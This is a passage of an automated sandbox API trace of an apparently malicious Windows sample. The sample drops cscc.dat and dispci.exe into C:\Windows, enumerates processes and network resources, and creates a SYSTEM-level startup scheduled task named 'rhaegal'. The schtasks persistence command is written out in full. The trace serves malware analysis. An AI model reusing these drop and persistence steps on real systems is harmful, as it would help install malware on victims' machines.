LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76710000 [0015.165] GetProcAddress (hModule=0x76710000, lpProcName="CoCreateGuid") returned 0x767515d5 [0015.165] GetProcAddress (hModule=0x76710000, lpProcName="CoTaskMemFree") returned 0x76766f41 [0015.165] GetProcAddress (hModule=0x76710000, lpProcName="StringFromCLSID") returned 0x7672eb17 [0015.165] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x760d0000 [0015.168] GetProcAddress (hModule=0x760d0000, lpProcName="CryptStringToBinaryW") returned 0x76105f65 [0015.168] GetProcAddress (hModule=0x760d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x760e6c0e [0015.168] GetProcAddress (hModule=0x760d0000, lpProcName="CryptBinaryToStringW") returned 0x7610a546 [0015.168] GetProcAddress (hModule=0x760d0000, lpProcName="CryptDecodeObjectEx") returned 0x760dd718 [0015.168] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76070000 [0015.168] GetProcAddress (hModule=0x76070000, lpProcName="PathFindFileNameW") returned 0x7608bb71 [0015.168] GetProcAddress (hModule=0x76070000, lpProcName="StrChrW") returned 0x76084640 [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="StrCmpW") returned 0x76088277 [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="StrCmpIW") returned 0x7608a147 [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="StrToIntW") returned 0x760850be [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="PathAppendW") returned 0x760881ef [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="StrStrW") returned 0x7607e52d [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="PathCombineW") returned 0x7608c39c [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="StrStrIW") returned 0x760846e9 [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="PathFindExtensionW") returned 0x7608a1b9 [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="StrCatW") returned 0x760ae105 [0015.169] GetProcAddress (hModule=0x76070000, lpProcName="PathFileExistsW") returned 0x760845bf [0015.169] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x749a0000 [0015.174] GetProcAddress (hModule=0x749a0000, lpProcName="GetAdaptersInfo") returned 0x749a9263 [0015.174] GetProcAddress (hModule=0x749a0000, lpProcName="GetIpNetTable") returned 0x749ae52a [0015.174] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x762f0000 [0015.176] GetProcAddress (hModule=0x762f0000, lpProcName=0x12) returned 0x762f6989 [0015.176] GetProcAddress (hModule=0x762f0000, lpProcName=0xa) returned 0x762f3084 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x34) returned 0x76307673 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0xc) returned 0x762fb131 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0xe) returned 0x762f2d57 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x73) returned 0x762f3ab2 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x4) returned 0x762f6bdd [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0xb) returned 0x762f311b [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x9) returned 0x762f2d8b [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x17) returned 0x762f3eb8 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x3) returned 0x762f3918 [0015.177] GetProcAddress (hModule=0x762f0000, lpProcName=0x13) returned 0x762f6f01 [0015.178] GetProcAddress (hModule=0x762f0000, lpProcName=0x10) returned 0x762f6b0e [0015.178] GetProcAddress (hModule=0x762f0000, lpProcName=0x97) returned 0x762f6a8a [0015.178] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74970000 [0015.180] GetProcAddress (hModule=0x74970000, lpProcName="WNetOpenEnumW") returned 0x74972f06 [0015.181] GetProcAddress (hModule=0x74970000, lpProcName="WNetEnumResourceW") returned 0x74973058 [0015.181] GetProcAddress (hModule=0x74970000, lpProcName="WNetCancelConnection2W") returned 0x74978cd1 [0015.181] GetProcAddress (hModule=0x74970000, lpProcName="WNetAddConnection2W") returned 0x74974744 [0015.181] GetProcAddress (hModule=0x74970000, lpProcName="WNetCloseEnum") returned 0x74972dd6 [0015.181] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74950000 [0015.188] GetProcAddress (hModule=0x74950000, lpProcName="NetApiBufferFree") returned 0x749413d2 [0015.188] GetProcAddress (hModule=0x74950000, lpProcName="NetWkstaGetInfo") returned 0x74955570 [0015.188] GetProcAddress (hModule=0x74950000, lpProcName="NetServerEnum") returned 0x74902f61 [0015.189] GetProcAddress (hModule=0x74950000, lpProcName="NetServerGetInfo") returned 0x74923cfa [0015.190] LoadLibraryA (lpLibFileName="DHCPSAPI.DLL") returned 0x748e0000 [0015.204] GetProcAddress (hModule=0x748e0000, lpProcName="DhcpEnumSubnetClients") returned 0x748e77b5 [0015.204] GetProcAddress (hModule=0x748e0000, lpProcName="DhcpEnumSubnets") returned 0x748e6b7c [0015.204] GetProcAddress (hModule=0x748e0000, lpProcName="DhcpRpcFreeMemory") returned 0x748e79ed [0015.204] GetProcAddress (hModule=0x748e0000, lpProcName="DhcpGetSubnetInfo") returned 0x748e7003 [0015.204] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a40000 [0015.204] GetProcAddress (hModule=0x76a40000, lpProcName="memcpy") returned 0x76a49910 [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="srand") returned 0x76a4f757 [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="memset") returned 0x76a49790 [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="memmove") returned 0x76a49e5a [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="free") returned 0x76a49894 [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="malloc") returned 0x76a49cee [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="sprintf") returned 0x76a5d354 [0015.205] GetProcAddress (hModule=0x76a40000, lpProcName="rand") returned 0x76a4c070 [0015.205] VirtualProtect (in: lpAddress=0xd4d000, dwSize=0x5cfb, flNewProtect=0x2, lpflOldProtect=0x18f590 | out: lpflOldProtect=0x18f590*=0x4) returned 1 [0015.205] GetComputerNameW (in: lpBuffer=0x18f42c, nSize=0x18f44c | out: lpBuffer="XDUWTFONO", nSize=0x18f44c) returned 1 [0015.207] wsprintfW (in: param_1=0x18f408, param_2="%08X%08X" | out: param_1="9A1966663AD6FDE5") returned 16 [0015.207] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="9A1966663AD6FDE5") returned 0x140 [0015.207] GetLastError () returned 0x0 [0015.207] PathCombineW (in: pszDest=0x18ee30, pszDir="C:\\Windows\\", pszFile="cscc.dat" | out: pszDest="C:\\Windows\\cscc.dat") returned="C:\\Windows\\cscc.dat" [0015.207] PathFileExistsW (pszPath="C:\\Windows\\cscc.dat") returned 0 [0015.207] GetCurrentProcess () returned 0xffffffff [0015.207] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76600000 [0015.207] GetProcAddress (hModule=0x76600000, lpProcName="IsWow64Process") returned 0x7661195e [0015.207] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ee14 | out: Wow64Process=0x18ee14) returned 1 [0015.207] FindResourceW (hModule=0xd40000, lpName=0x8, lpType=0x6) returned 0xd590f8 [0015.207] LoadResource (hModule=0xd40000, hResInfo=0xd590f8) returned 0xd7da60 [0015.207] LockResource (hResData=0xd7da60) returned 0xd7da60 [0015.207] SizeofResource (hModule=0xd40000, hResInfo=0xd590f8) returned 0x18003 [0015.210] CreateFileW (lpFileName="C:\\Windows\\cscc.dat" (normalized: "c:\\windows\\cscc.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x144 [0015.211] WriteFile (in: hFile=0x144, lpBuffer=0x334b88*, nNumberOfBytesToWrite=0x336c8, lpNumberOfBytesWritten=0x18ee20, lpOverlapped=0x0 | out: lpBuffer=0x334b88*, lpNumberOfBytesWritten=0x18ee20*=0x336c8, lpOverlapped=0x0) returned 1 [0015.213] CloseHandle (hObject=0x144) returned 1 [0015.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x144 [0015.219] Process32FirstW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0015.220] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0015.220] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0015.221] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0015.221] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0015.222] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0015.222] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0015.223] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0015.223] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0015.224] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0015.224] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.225] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.225] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.226] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.226] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.227] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0015.227] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.228] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.228] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0015.229] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.229] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0015.230] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0015.230] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0015.231] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0015.231] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x348, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0015.232] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0015.233] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stands carbon.exe")) returned 1 [0015.233] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="condos_pine.exe")) returned 1 [0015.234] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="judgment gone rise whats.exe")) returned 1 [0015.234] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="browser feed experimental ea.exe")) returned 1 [0015.235] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="practices.exe")) returned 1 [0015.235] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reasons_hampton_considers.exe")) returned 1 [0015.236] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flat.exe")) returned 1 [0015.236] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="latest coach limit.exe")) returned 1 [0015.237] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="passion_ou.exe")) returned 1 [0015.237] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist_boot_telecommunications.exe")) returned 1 [0015.238] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lines.exe")) returned 1 [0015.238] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="replacing-foul-vulnerable-switched.exe")) returned 1 [0015.238] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mustang-entirely-banana.exe")) returned 1 [0015.239] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="coupledtalkedl.exe")) returned 1 [0015.239] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="highestbanglawn.exe")) returned 1 [0015.240] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="creator_thread.exe")) returned 1 [0015.240] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0015.241] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0015.241] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0015.241] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0015.242] Process32NextW (in: hSnapshot=0x144, lppe=0x18f224 | out: lppe=0x18f224*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1 [0015.242] GetCurrentProcessId () returned 0x960 [0015.242] CloseHandle (hObject=0x144) returned 1 [0015.242] FindResourceW (hModule=0xd40000, lpName=0x9, lpType=0x6) returned 0xd59108 [0015.242] LoadResource (hModule=0xd40000, hResInfo=0xd59108) returned 0xd95a64 [0015.242] LockResource (hResData=0xd95a64) returned 0xd95a64 [0015.242] SizeofResource (hModule=0xd40000, hResInfo=0xd59108) returned 0x10b9c [0015.244] PathAppendW (in: pszPath="C:\\Windows\\", pMore="dispci.exe" | out: pszPath="C:\\Windows\\dispci.exe") returned 1 [0015.245] CreateFileW (lpFileName="C:\\Windows\\dispci.exe" (normalized: "c:\\windows\\dispci.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x144 [0015.245] WriteFile (in: hFile=0x144, lpBuffer=0x23c0048*, nNumberOfBytesToWrite=0x22e00, lpNumberOfBytesWritten=0x18f028, lpOverlapped=0x0 | out: lpBuffer=0x23c0048*, lpNumberOfBytesWritten=0x18f028*=0x22e00, lpOverlapped=0x0) returned 1 [0015.246] CloseHandle (hObject=0x144) returned 1 [0015.248] wsprintfW (in: param_1=0x18db88, param_2="/c %ws" | out: param_1="/c schtasks /Delete /F /TN rhaegal") returned 34 [0015.248] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18e388, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0015.248] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c schtasks /Delete /F /TN rhaegal", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e9a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e9e4 | out: lpCommandLine="/c schtasks /Delete /F /TN rhaegal", lpProcessInformation=0x18e9e4*(hProcess=0x14c, hThread=0x144, dwProcessId=0x974, dwThreadId=0x978)) returned 1 [0015.261] Sleep (dwMilliseconds=0x0) [0015.278] Sleep (dwMilliseconds=0x7d0) [0017.315] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18ee1c, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.316] wsprintfW (in: param_1=0x18ea0c, param_2="schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" | out: param_1="schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"") returned 148 [0017.316] wsprintfW (in: param_1=0x18db88, param_2="/c %ws" | out: param_1="/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"") returned 151 [0017.316] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18e388, nSize=0x30c | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.316] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e9a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18e9e4 | out: lpCommandLine="/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"", lpProcessInformation=0x18e9e4*(hProcess=0x150, hThread=0x154, 